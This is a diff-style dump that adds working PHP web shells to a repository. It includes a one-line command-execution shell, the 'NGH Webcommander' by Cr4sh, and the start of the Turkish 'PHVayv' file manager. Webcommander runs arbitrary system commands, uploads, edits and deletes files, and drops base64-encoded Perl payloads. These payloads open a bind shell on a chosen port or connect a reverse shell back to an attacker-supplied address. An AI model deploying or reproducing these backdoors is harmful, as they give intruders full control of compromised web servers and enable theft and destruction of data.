+<? $cmd = $_REQUEST["-cmd"];?><onLoad="document.forms[0].elements[-cmd].focus()"><form method=POST><br><input type=TEXT name="-cmd" size=64 value=<?=$cmd?>><hr><pre><?if($cmd != "") print Shell_Exec($cmd);?></pre></form><br>
+<h1>---------------------------------------------------------------------------</h1><br>
+<b>--Coded by Silver©--<br>
+~|_Team .:National Cracker Crew:._|~<br>
+<a href="http://www.n-c-c.6x.to" target="_blank">-->NCC<--</a></center></b></html>

php/NGH.php

@@ -0,0 +1,462 @@
+<?
+/* Webcommander by Cr4sh_aka_RKL v0.3.9 NGH edition :p */
+
+$script = $_SERVER["SCRIPT_NAME"];
+
+/* username and pass here ***************/
+
+$user = "yourlogin";
+$pass = "yourpass";
+
+/****************************************/
+
+$login = @$_POST['login'];
+$luser = @$_POST['user'];
+$lpass = @$_POST['pass'];
+$act = @$_GET['act'];
+
+   $logo = "R0lGODlhMAAwAOYAAAAAAP////r6+jEvKzQ0NQICATc3HiAgGyoqJxsbGQ4ODXl5dPr68m1taoWFgj4+Pf39+vr6+Obm5Pj49/Ly"
+          ."8ezs693d3MXFxJaWlV5dRtDOnquphqumcCcmGrezf8G9icnFlKCdet/br9jUqePgt+fkvOTj1X94PJKLUby7sk9JHF9ZKnJrPDk4"
+          ."MEdAFD08NqqnmBUUEGxoVtnTukdFPV1cWGZlYezjxPXv2JCNgoN8ZuDcz3VvX/Dnz9vWx8fDt/jz5ZmWjrOwp/bz67mxnOrgyLu1"
+          ."p9PNwfLt41BPTamoprGYabqrkK6gh+vcwu7izOLKpObSsujVtY6Cb+nXuerZveHFnbymheTNqubQrvf18ruedvDm2LW0s9DPz/v7"
+          ."+7m5uQUFBQICAv///wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
+          ."AAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEAAGMALAAAAAAwADAAAAf/gGOCg4SFhoeIiYqLjI2OhFORUzqUOjyXlzKaMjU1SQ0L"
+          ."j4tTXWCmp6inXV1KGA6doaKIU2ACtre4uBUSXmAODhhJsoe0uca4FLxKCxcYL8OFOrXH1BQWXjYSFw4E0IPF1NQVFUkC2tzeY9K2"
+          ."BQhJDzEAAOEU5ebb3dDSCghdFBS7MDSQZ2tCriQVbJ17NkxHghwBLIDxYsFCBQtKbCAQYBBXEosCvmgLNgwAhi9dFjQgQOABKC9K"
+          ."BhpLQjGhyGY2RHVBoK1Bgi5fbHUB4KBZv4MJEiB4kKQGKFCPDkx0ICZoLgBdXM3DpQ2MkiAOFtio8SCnozBeLgDoaCyGr623/ybw"
+          ."AtMFRo6wSWg8ClMBDFxjBLxg+MtxwrULrILksNHikRgKSgjjomFhsDEtF70cSQEjyIIBjjFKvvVAgmVcE7RY23HkhxEYnx8hEB0O"
+          ."wYTTBbVoQSJhh2bXU0A3WjEAYwEXyJMnt70AQIHcWoYgQWKC9Y8UOYQrWrHihALEBFaoGJ98PIHKCjrESB1dOnUfPlpnX9T9xAkW"
+          ."MRSsYMG/f/8VBhzAnQoxtCcdF1zs4MMMM8y3HQonoMABBx+MMEIRSAQQABJFiDDCBx4sAeEKCLQ3HRIJ7sBgCI09iIIHI4ggYwk9"
+          ."1GhCCSSMAMIHH3CAgg4svDDEEECciGARDDbRYv8iK6CwxAdMpNBDCSWMEMIGGmgAAggbyJBBBiiEoEMGJqTwg3s7CGGEEzMouYgN"
+          ."OnAQQgEAENHDDTAU0IKFI2Qgz58d/JgCAA8AYagRALxQRBVNMJSIDQ4QAYM8B9yAAxEAtEACCX4moIOYChTwQgiDPkAkEIgqWgUT"
+          ."einSQA4/RAaAGAswUCoSRwCgwBEKzhBCDDRsUOqpqfbgBKuLvPqDELrOasGtQQBQww7UMpjlB4MOkMK2OSRqLLKuwhrZAzUQOmxz"
+          ."C5hgAgyZyKDBoH/++cKd4CaiLLMPVKCAtIQOga66AxUg8LsAHLDAweXOe0O9iDTgQArjBjCYPKYyi4D/uj/AsIE8IJRqKKreLtzq"
+          ."ow+PCwEDD1A8XQLSUkvCxgB4MOgLQOCAQ6o3VHHFyIjYsAArhEaghVqESlDmvgm0wDIAHYSQqs2XZuqEzjwf4rMQSrg0wT8OvGCD"
+          ."CRbskEIS+ybKAwc6/OB1jU8Y0YIMVUhxhaOIsHACByD0wMANOHqY5Y48guiBnChkwPYNTkxdBRVRZLHFkojY96IIDPQ9wt+CDz4h"
+          ."hCy0UEQRiS9OhRSNY/E4I+O9yAAJfgPugeaEs4BAB6BPPTrpWWABBRRbaLdIgAjM3sHwBxA//PG0g764FLjnvrsVS/jOSBJdDOke"
+          ."igj28MTnyi8fRem7Q2EFc/TSL5KEEdcjyIX2T2wfOhWjl667+OOTL0oSQpyIPRftu2874/J7Xv3s9wj8TUd9/Gtf7USHOyzMb4Dj"
+          ."i9791GQEIliQCEzIYAavwMErbOGDIFzCFpZAwhKWTxEdGIAKV8jCFrrwhStMhwxnSMMa2tAQgQAAOw==";
+/* bd.pl ********************************/
+   $bind = "IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vYmFzaCAtaSI7DQppZiAoQEFSR1YgPCAxKSB7IGV4aXQoMSk7IH0NCiRMSVNU"
+          ."RU5fUE9SVD0kQVJHVlswXTsNCnVzZSBTb2NrZXQ7DQokcHJvdG9jb2w9Z2V0cHJvdG9ieW5hbWUoJ3RjcCcpOw0Kc29ja2V0KFMs"
+          ."JlBGX0lORVQsJlNPQ0tfU1RSRUFNLCRwcm90b2NvbCkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0"
+          ."KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJExJU1RFTl9QT1JULElOQUREUl9BTlkp"
+          ."KSB8fCBkaWUgIkNhbnQgb3BlbiBwb3J0XG4iOw0KbGlzdGVuKFMsMykgfHwgZGllICJDYW50IGxpc3RlbiBwb3J0XG4iOw0Kd2hp"
+          ."bGUoMSkNCnsNCmFjY2VwdChDT05OLFMpOw0KaWYoISgkcGlkPWZvcmspKQ0Kew0KZGllICJDYW5ub3QgZm9yayIgaWYgKCFkZWZp"
+          ."bmVkICRwaWQpOw0Kb3BlbiBTVERJTiwiPCZDT05OIjsNCm9wZW4gU1RET1VULCI+JkNPTk4iOw0Kb3BlbiBTVERFUlIsIj4mQ09O"
+          ."TiI7DQpleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCmNsb3NlIENPTk47DQpl"
+          ."eGl0IDA7DQp9DQp9";
+/* connectback-backdoor on perl ********/
+   $backcon = "IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj"
+          ."aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1p"
+          ."bmV0X2F0b24oJHRhcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIp"
+          ."IHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9J"
+          ."TkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8"
+          ."fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsN"
+          ."Cm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNURElOKTsNCmNsb3NlKFNURE9VVCk7"
+          ."DQpjbG9zZShTVERFUlIpOw==";
+
+if ($act == "showlogo") {
+ header("Content-type: image/gif");
+ echo base64_decode($logo);
+ exit;
+}
+if ($login) {
+ Sleep(1);
+ if ($luser == $user && $lpass == $pass) {
+  setcookie("logined", $pass);
+ } else {
+  die("<font color=#DF0000>Login error</font>");
+ }
+} else {
+ $logined = @$_COOKIE['logined'];
+ if ($logined != $pass) {
+?>
+ <form action=<?=$script?> method=POST>
+ user: <input type=text name=user><br>
+ pass: <input type=password name=pass><br><br>
+ <input type=submit name=login value=login>
+ </form>
+<?
+  exit;
+ }
+}
+?>
+ <html>
+ <head>
+ <style type="text/css"><!--
+ body {background-color: #cccccc; color: #000000; FONT-SIZE: 10pt}
+ body, td, th, h1, h2 {font-family: Verdana;}
+ pre {margin: 0px; font-family: monospace;}
+ a:link {color: #000099; text-decoration: none;}
+ a:visited {color: #000099; text-decoration: none;}
+ a:hover {text-decoration: underline;}
+ table {border-collapse: collapse;}
+ td, th { border: 1px solid #000000; font-size: 75%; vertical-align: baseline;}
+ .e {background-color: #ccccff; font-weight: bold; color: #000000;}
+ .h {background-color: #9999cc; font-weight: bold; color: #000000;}
+ .v {background-color: #cccccc; color: #000000;}
+ .v2 {background-color: #dfdfdf; color: #000000;}
+ .v3 {background-color: #FEB4BB; color: #000000;}
+ i {color: #666666; background-color: #cccccc;}
+ img {float: right; border: 0px;}
+ hr {width: 600px; background-color: #cccccc; border: 0px; height: 1px; color: #000000;}
+ input, textarea {FONT-SIZE: 8pt; border: 1px solid #222222; color: #222222; background-color: #dfdfdf; }
+ //--></style>
+ <title>Webcommander at <?=$_SERVER["HTTP_HOST"]?></title>
+ </head>
+ <body>
+<?
+$path = @rawurldecode($_GET['dir']);
+$cmd = @$_GET['cmd'];
+if ($act == "mass") {
+ $post = array_keys($_POST);
+ $todo = $_POST[$post[sizeof($post)-2]];
+ $to = $_POST[$post[sizeof($post)-1]];
+ for ($i = 0; $i < sizeof($post)-2; $i++) {
+  if ($_POST[$post[$i]]) {
+   if ($todo == "del") {
+    rm($_POST[$post[$i]]);
+   }
+   elseif ($todo == "mv") {
+    mvcp($_POST[$post[$i]], $to."/".$post[$i], $todo);
+   }
+   else {
+    mvcp($_POST[$post[$i]], $to."/".$post[$i], "cp");
+   }
+  }
+ }
+ //exit;
+}
+elseif ($act == mkdir) {
+ $dirname = @$_POST['dirname'];
+ $path = @$_POST['dir'];
+ if (!$dirname) die("<font color=#DF0000>Âåäèòå èìÿ</font>\n");
+ if (!@mkdir($path.$dirname)) die("<font color=#DF0000>Íåìîãó ñîçäàòü ïàïêó</font>\n");
+}
+elseif ($act == upload) {
+ $userfile = @$_FILES['userfile']['tmp_name'];
+ $uploaddir = @$_POST['uploaddir'];
+ if (is_uploaded_file($userfile))  {
+  @copy($userfile, $uploaddir.$_FILES['userfile']['name']);
+  @unlink($userfile);
+  $path = $uploaddir;
+ } else die("<font color=#DF0000>Îøèáêà ïðè çàãðóçêå ôàéëà</font>\n");
+}
+elseif ($act == "rm") {
+ $name = @$_GET['name'];
+ rm($name);
+ $inf = pathinfo($name);
+ $path = $inf['dirname'];
+}
+elseif ($act == "viev") {
+ $name = @$_GET['name'];
+ if (file_exists($name)) {
+  echo "<form action=".$script."?act=updatefile method=POST>\n".
+       "ôàéë <b>".$name."</b><br>\n";
+  $out = implode("", file($name));
+  echo "<textarea rows=25 cols=70 name=text>";
+  print_r ($out);
+  echo "</textarea><br>\n".
+       "<input type=hidden name=file value=\"".$name."\">\n".
+       "<input type=submit value=ñîõðàíèòü>\n".
+       "</form>\n".
+       "[ <a href=javascript:history.go(-1)>back</a> ]";
+ } else die("<font color=#DF0000>Ôàéë íå íàéäåí</font>\n");
+ exit;
+}
+elseif ($act == "updatefile") {
+ $filename = @$_POST['file'];
+ $text = @$_POST['text'];
+ if (is_writable($filename)) {
+  $handle = fopen($filename, "w+");
+  if (fwrite($handle, stripslashes($text)) === FALSE) {
+   die("<font color=#DF0000>Îøèáêà çàïèñè â ôàéë</font>\n");
+  }
+ } else die("<font color=#DF0000>Ôàéë íåäîñòóïåí äëÿ çàïèñè</font>\n");
+ fclose($handle);
+ $inf = pathinfo($filename);
+ $path = $inf['dirname'];
+}
+elseif ($act == "touch") {
+ $userfile = @$_POST['file'];
+ $userdir = @$_POST['dir'];
+ if (!$userfile) {
+  die("<font color=#DF0000>Âåäèòå èìÿ</font>\n");
+ }
+ $handle = fopen($userdir.$userfile, "w+");
+ if (fwrite($handle, "") === FALSE)  {
+   die("<font color=#DF0000>Îøèáêà ñîçäàíèÿ ôàéëà</font>\n");
+ }
+ fclose($handle);
+ $path = $userdir;
+}
+elseif ($act == "renameform") {
+ $name = @$_GET['name'];
+ echo "<form action=".$script."?act=rename method=POST>"
+     ."<b>Ïåðåèìåíîâàòü, êîïèðîâàòü èëè ïåðåìåñòèòü </b>".$name."<br>"
+     ."<input type=text name=to size=40 value=".$name.">"
+     ."<input type=hidden name=from value=".$name."><br>"
+     ."<input type=radio name=todo value=mv checked> ïåðåìåñòèòü<br>"
+     ."<input type=radio name=todo value=cp> ñêîïèðîâàòü<br>"
+     ."<input type=submit value=Go></form>"
+     ."[ <a href=javascript:history.go(-1)>back</a> ]";
+ exit;
+}
+elseif ($act == "rename") {
+ $from = @$_POST['from'];
+ $to = @$_POST['to'];
+ $todo = @$_POST['todo'];
+ mvcp($from, $to, $todo);
+ $inf = pathinfo($from);
+ $path = $inf['dirname'];
+}
+elseif ($act == "bindshell") {
+ $port = @$_POST['port'];
+ if (!$port) {
+  die("<font color=#DF0000>Óêàæèòå ïîðò</font>");
+ }
+ $file = "/tmp/bd";
+ $handle = fopen($file, "w+");
+ if (fputs($handle, base64_decode($bind)) === FALSE)  {
+   die("<font color=#DF0000>Îøèáêà ñîçäàíèÿ ôàéëà ".$file."</font>\n");
+ } else {
+  fclose($handle);
+  passthru("perl ".$file." ".$port." > /dev/null &");
+ }
+}
+elseif ($act == "backconnect") {
+ $port = @$_POST['port'];
+ $addr = @$_POST['addr'];
+ if (!$port || !$addr) {
+  die("<font color=#DF0000>Óêàæèòå ïîðò è àäðåññ</font>");
+ }
+ $file = "/tmp/bcon";
+ $handle = fopen($file, "w+");
+ if (fputs($handle, base64_decode($backcon)) === FALSE)  {
+   die("<font color=#DF0000>Îøèáêà ñîçäàíèÿ ôàéëà  ".$file."</font>\n");
+ } else {
+  fclose($handle);
+  passthru("perl ".$file." ".$addr." ".$port." > /dev/null &");
+ }
+}
+elseif ($act == "phpinfo") {
+ phpinfo();
+ exit;
+}
+if (!$path) {
+ $dir = getcwd()."/";
+} else {
+ $dir = stripslashes($path);
+ if ($dir[strlen($dir)-1] != "/") $dir .= "/";
+}
+$dir = str_replace("\\", "/", $dir);
+$dir = str_replace("//", "/", $dir);
+$arr = explode("/", $dir);
+for ($i=0; $i<count($arr)-2; $i++) {
+ $back .= $arr[$i]."/";
+}
+?>
+ <table class=e>
+  <tr>
+   <td rowspan=3><img src=<?=$script?>?act=showlogo></td>
+   <td><b>Host:</b></td><td class=v><?=$_SERVER["HTTP_HOST"]?></td>
+  </tr>
+  <tr>
+   <td><b>IP address:</b></td><td class=v><?=$_SERVER["SERVER_ADDR"]?></td>
+  </tr>
+  <tr>
+   <td><b>Software:</b></td><td class=v><?=$_SERVER["SERVER_SOFTWARE"]?></td>
+  </tr>
+ </table>
+ <form action=<?=$script?> method=GET>
+ <b>Êîìàíäà:</b> <input type=text name=cmd value="<?=$cmd?>" size=120>
+ <input type=hidden name=dir value="<?=$dir?>"><br>
+ <textarea rows=8 cols=97>
+<?
+if ($cmd) {
+ exec($cmd, $out);
+ echo convert_cyr_string(implode("\r\n", $out), "a", "w");
+}
+?>
+</textarea></form>
+<form action=<?=$script?>?act=bindshell method=POST>
+<b>Bind /bin/bash at port: </b><input type=text name=port size=8>
+<input type=submit value=Bind>
+</form>
+<form action=<?=$script?>?act=backconnect method=POST>
+<b>Connectback:</b> Àäðåññ <input type=text name=addr>
+Ïîðò <input type=text name=port size=8>
+<input type=submit value=Connect>
+</form>
+<?
+if($handle = @opendir($dir)) {
+?>
+ <form action=<?=$script?>?act=mass method=POST>
+ <table width=700>
+ <tr class=e><td colspan=7><b><?=$dir?></b></td></tr>
+ <tr class=h><td><a href="<?=$script?>?dir=<?=$back?>"><<</a></td>
+ <td><small><font color=#D1D1E1>size</font></small></td>
+ <td><small><font color=#D1D1E1>date</font></small></td>
+ <td colspan=4><small><font color=#D1D1E1>permissions</font></small></td></tr>
+<?
+ $cssclass = "v";
+ while ($file = readdir($handle)) {
+  if (is_dir($dir.$file) && $file != ".." && $file != ".") {
+   $inf = pathinfo($dir.$file);
+   echo "<tr class=".$cssclass." onmouseover=\"className='v3'\"  onmouseout=\"className='".$cssclass."'\">\n"
+       ."<td><input type=checkbox name=".$file." value=".$dir.$file.">"
+       ."[<a href=\"".$script."?dir=".rawurlencode($inf['dirname'])."/".rawurlencode($inf['basename'])."\">"
+       .$file."</a>]</td><td><b>--dir</b></td><td>".date("d.m.y/H:i", filemtime($dir.$file))."</td>\n"
+       ."<td>".parseperms(fileperms($dir.$file))."</td>\n"
+       ."<td><a href=\"".$script."?act=rm&name=".rawurlencode($dir.$file)."\">DEL</a></td>\n"
+       ."<td colspan=2><a href=\"".$script."?act=renameform&name=".rawurlencode($dir.$file)."\">MOVE(COPY)</a></td></tr>\n";
+   if ($cssclass == "v") $cssclass = "v2";
+   elseif ($cssclass == "v2") $cssclass = "v";
+  }
+ }
+ rewinddir($handle);
+ while ($file = readdir($handle)) {
+  if (is_file($dir.$file)) {
+   echo "<tr class=".$cssclass." onmouseover=\"className='v3'\"  onmouseout=\"className='".$cssclass."'\">\n"
+       ."<td><input type=checkbox name=".$file." value=".$dir.$file.">"
+       ."[".$file."]</td><td>".filesize($dir.$file)."</td><td>\n"
+       .date("d.m.y/H:i", filemtime($dir.$file))."</td>\n"
+       ."<td>".parseperms(fileperms($dir.$file))."</td>\n"
+       ."<td><a href=\"".$script."?act=rm&name=".rawurlencode($dir.$file)."\">DEL</a></td>\n"
+       ."<td><a href=\"".$script."?act=renameform&name=".rawurlencode($dir.$file)."\">MOVE(COPY)</a></td>\n"
+       ."<td><a href=\"".$script."?act=viev&name=".rawurlencode($dir.$file)."\">EDIT</a></td></tr>\n";
+   if ($cssclass == "v") $cssclass = "v2";
+   elseif ($cssclass == "v2") $cssclass = "v";
+  }
+ }
+ closedir($handle);
+?>
+ </table>
+ <b>Ñ îòìå÷åíûìè:</b> <input type=radio name=mass value=del checked> Óäàëèòü
+ <b>[</b> <input type=radio name=mass value=mv> Ïåðåìåñòèòü
+ <input type=radio name=mass value=cp> Êîïèðîâàòü
+ â <input type=text name=to value="<?=$dir?>"> <b>]</b>
+ <br><input type=submit value=Âûïîëíèòü>
+ </form>
+ <form action=<?=$script?>?act=mkdir method=POST>
+ <b>Ñîçäàòü ïàïêó</b><br>
+ <input type=text name=dirname size=40>
+ <input type=hidden name=dir value="<?=$dir?>">
+ <input type=submit value=Ñîçäàòü></form>
+ <FORM ENCTYPE=multipart/form-data ACTION=<?=$script?>?act=touch METHOD=POST>
+ <b>Ñîçäàòü ïóñòîé ôàéë</b><br>
+ <INPUT type=text NAME=file size=40>
+ <input type=hidden name=dir value="<?=$dir?>">
+ <INPUT TYPE=submit VALUE=Ñîçäàòü></FORM>
+ <FORM ENCTYPE=multipart/form-data ACTION=<?=$script?>?act=upload METHOD=POST>
+ <b>Çàêà÷àòü ôàéë</b><br>
+ <INPUT NAME=userfile TYPE=file size=40>
+ <input type=hidden name=uploaddir value="<?=$dir?>">
+ <INPUT TYPE=submit VALUE=Îòïðàâèòü></FORM>
+ <a href=<?=$script?>?act=phpinfo>Phpinfo()</a>
+<?
+} else die("<font color=#DF0000>Äèðåêòîðèÿ íå íàéäåíà</font>\n");
+function rm($name) {
+ if (is_file($name)) {
+  if (!@unlink($name)) die("<font color=#DF0000>Íåìîãó óäàëèòü ôàéë <b>".$name."</b></font>\n");
+ }
+ elseif (is_dir($name)) deldir($name);
+}
+function mvcp($from, $to, $todo) {
+ if ($todo == "mv") {
+  if (is_file($from)) {
+   if (!rename($from, $to)) {
+    die("<font color=#DF0000>Îøèáêà ïðè ïåðåìåùåíèè ôàéëà ".$from."</font>");
+   }
+  }
+  elseif (is_dir($from)) {
+   mvdir($from, $to, $todo);
+  }
+ } else {
+  if (is_file($from)) {
+   if (!copy($from, $to)) {
+    die("<font color=#DF0000>Îøèáêà ïðè êîïèðîâàíèè ôàéëà ".$from."</font>");
+   }
+  }
+  elseif (is_dir($from)) {
+   mvdir($from, $to, "cp");
+  }
+ }
+}
+function deldir($name) {
+ if (@$handle=opendir($name)) {
+  while ($file = readdir($handle)) {
+   if ($file != ".." && $file != ".") {
+    if (is_file($name."/".$file)) {
+     unlink($name."/".$file);
+    }
+    elseif (is_dir($name."/".$file)) {
+     deldir($name."/".$file);
+    }
+   }
+  }
+  closedir($handle);
+ } else die("<font color=#DF0000>Íåìîãó óäàëèòü ïàïêó <b>".$name."</b></font>\n");
+ rmdir($name);
+}
+function mvdir($from, $to, $todo) {
+ if (@$handle = opendir($from)) {
+  mkdir($to);
+  while ($file = readdir($handle)) {
+   if ($file != ".." && $file != ".") {
+    if (is_file($from."/".$file)) {
+     if (!copy($from."/".$file, $to."/".$file)) {
+      die("<font color=#DF0000>Îøèáêà ïðè êîïèðîâàíèè ôàéëà ".$from."/".$file."</font>");
+     }
+    }
+    elseif (is_dir($from."/".$file)) {
+     mvdir($from."/".$file, $to."/".$file, $todo);
+    }
+   }
+  }
+  closedir($handle);
+  if ($todo == "mv") deldir($from);
+ } else die("<font color=#DF0000>Íåìîãó êîïèðîâàòü ïàïêó <b>".$name."</b></font>\n");
+}
+function parseperms($perms)
+{
+ if (!$perms) return "null";
+ if (($perms & 0xC000) == 0xC000) {
+    $info = 'socket ';
+ } elseif (($perms & 0xA000) == 0xA000) {
+    $info = 'link ';
+ } elseif (($perms & 0x8000) == 0x8000) {
+    $info = '-';
+ } elseif (($perms & 0x6000) == 0x6000) {
+    $info = 'b';
+ } elseif (($perms & 0x4000) == 0x4000) {
+    $info = 'dir ' ;
+ } elseif (($perms & 0x2000) == 0x2000) {
+    $info = 'c';
+ } elseif (($perms & 0x1000) == 0x1000) {
+    $info = 'p';
+ } else {
+    $info = 'u';
+ }
+ $info .= (($perms & 0x0100) ? 'r' : '-');
+ $info .= (($perms & 0x0080) ? 'w' : '-');
+ $info .= (($perms & 0x0040) ?
+            (($perms & 0x0800) ? 's' : 'x' ) :
+            (($perms & 0x0800) ? 'S' : '-'));
+ $info .= (($perms & 0x0020) ? 'r' : '-');
+ $info .= (($perms & 0x0010) ? 'w' : '-');
+ $info .= (($perms & 0x0008) ?
+            (($perms & 0x0400) ? 's' : 'x' ) :
+            (($perms & 0x0400) ? 'S' : '-'));
+ $info .= (($perms & 0x0004) ? 'r' : '-');
+ $info .= (($perms & 0x0002) ? 'w' : '-');
+ $info .= (($perms & 0x0001) ?
+            (($perms & 0x0200) ? 't' : 'x' ) :
+            (($perms & 0x0200) ? 'T' : '-'));
+ return $info;
+}
+echo "<br><small>NGHshell 0.3.9 by Cr4sh</body></html>\n";
+
+/* EOF **********************************/
+?>

php/PH Vayv.php

@@ -0,0 +1,597 @@
+<? if($sistembilgisi > "") {phpinfo();} else { ?>
+
+
+<?$fistik=PHVayv;?>
+
+
+<?if ($sildos>"") {unlink("$dizin/$sildos");} ?>
+
+<?if ($dizin== ""){$dizin=realpath('.');}{$dizin=realpath($dizin);}?>
+
+<?if ($silklas > ""){rmdir($silklas);}?>
+
+<?if ($yeniklasor > "") {mkdir("$dizin/$duzenx2",777);}?>
+
+
+
+<?if ($yenidosya == "1") {
+$baglan=fopen("$dizin/$duzenx2",'w');
+fwrite($baglan,$duzenx);
+fclose($baglan);}
+?>
+
+
+
+
+<?if ($duzkaydet > "") {
+
+$baglan=fopen($duzkaydet,'w');
+fwrite($baglan,$duzenx);
+fclose($baglan);}
+?>
+
+
+
+
+<?if ($yenklas>"") {;?>
+<body topmargin="0" leftmargin="0">
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1" height="59">
+  <tr>
+    <td width="70" bgcolor="#000000" height="76">
+    <p align="center">
+    <img border="0" src="http://www.aventgrup.net/avlog.gif"></td>
+    <td width="501" bgcolor="#000000" height="76" valign="top">
+    <font face="Verdana" style="font-size: 8pt" color="#B7B7B7">
+    <span style="font-weight: 700">
+    <br>
+    AventGrup©<br>
+    </span>Avrasya Veri ve NetWork Teknolojileri Geliþtirme Grubu<br>
+    <span style="font-weight: 700">
+    <br>
+    PHVayv 1.0</span></font></td>
+    <td width="431" bgcolor="#000000" height="76" valign="top">
+    <p align="right"><span style="font-weight: 700">
+    <font face="Verdana" color="#858585" style="font-size: 2pt"><br>
+    </font><font face="Verdana" style="font-size: 8pt" color="#9F9F9F">
+    <a href="http://www.aventgrup.net" style="text-decoration: none">
+    <font color="#858585">www.aventgrup.net</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;<br>
+    </font></span><font face="Verdana" style="font-size: 8pt" color="#858585">
+    <a href="mailto:shopen@aventgrup.net" style="text-decoration: none">
+    <font color="#858585">SHOPEN</font></a></font><font face="Verdana" style="font-size: 8pt" color="#B7B7B7"><a href="mailto:shopen@aventgrup.net" style="text-decoration: none"><font color="#858585">@AventGrup.Net</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;</font></td>
+  </tr>
+  </table>
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" id="AutoNumber5" width="100%" height="20">
+      <tr>
+        <td width="110" bgcolor="#9F9F9F" height="20"><font face="Verdana">
+        <span style="font-size: 8pt">&nbsp;Çalýþýlan </span></font>
+        <font face="Verdana" style="font-size: 8pt">Dizin</font></td>
+        <td bgcolor="#D6D6D6" height="20">
+        <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber4">
+          <tr>
+            <td width="1"></td>
+            <td><font face="Verdana" style="font-size: 8pt">&nbsp;<?echo "$dizin"?></font></td>
+            <td width="65">
+            &nbsp;</td>
+          </tr>
+        </table>
+        </td>
+      </tr>
+</table>
+
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber30" height="184">
+  <tr>
+    <td width="100%" bgcolor="#000000" height="19">&nbsp;</td>
+  </tr>
+  <tr>
+    <td width="100%" bgcolor="#9F9F9F" align="center" height="144">
+    <form method="POST" action="<?echo "$fistik.php?yeniklasor=1&dizin=$dizin"?>" 
+      <p align="center"><br>
+      <font
+                color="#FFFFFF" size="1" face="Arial">
+<input
+                type="text" size="37" maxlength="32"
+                name="duzenx2" value="Klasör Adý"
+                class="search"
+                onblur="if (this.value == '') this.value = 'Kullanýcý'"
+                onfocus="if (this.value == 'Kullanýcý') this.value=''"
+                style="BACKGROUND-COLOR: #eae9e9; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: center"></font></p>
+<p align="center">
+	<span class="gensmall">
+		<input type="submit" size="16"
+		name="duzenx1" value="Kaydet"
+		style="BACKGROUND-COLOR: #95B4CC; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: center"
+		</span></span><b><font face="Verdana, Arial, Helvetica, sans-serif" size="2"><br>
+&nbsp;</font></b></p>
+</form>
+</td>
+  </tr>
+  <tr>
+    <td width="100%" bgcolor="#000000" align="center" height="19">
+    &nbsp;</td>
+  </tr>
+  </table>
+  
+
+
+<? } else { ?>
+
+
+
+
+<?if ($yendos>"") {;
+?>
+
+<body topmargin="0" leftmargin="0">
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1" height="59">
+  <tr>
+    <td width="70" bgcolor="#000000" height="76">
+    <p align="center">
+    <img border="0" src="http://www.aventgrup.net/avlog.gif"></td>
+    <td width="501" bgcolor="#000000" height="76" valign="top">
+    <font face="Verdana" style="font-size: 8pt" color="#B7B7B7">
+    <span style="font-weight: 700">
+    <br>
+    AventGrup©<br>
+    </span>Avrasya Veri ve NetWork Teknolojileri Geliþtirme Grubu<br>
+    <span style="font-weight: 700">
+    <br>
+    PHVayv 1.0</span></font></td>
+    <td width="431" bgcolor="#000000" height="76" valign="top">
+    <p align="right"><span style="font-weight: 700">
+    <font face="Verdana" color="#858585" style="font-size: 2pt"><br>
+    </font><font face="Verdana" style="font-size: 8pt" color="#9F9F9F">
+    <a href="http://www.aventgrup.net" style="text-decoration: none">
+    <font color="#858585">www.aventgrup.net</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;<br>
+    </font></span><font face="Verdana" style="font-size: 8pt" color="#858585">
+    <a href="mailto:shopen@aventgrup.net" style="text-decoration: none">
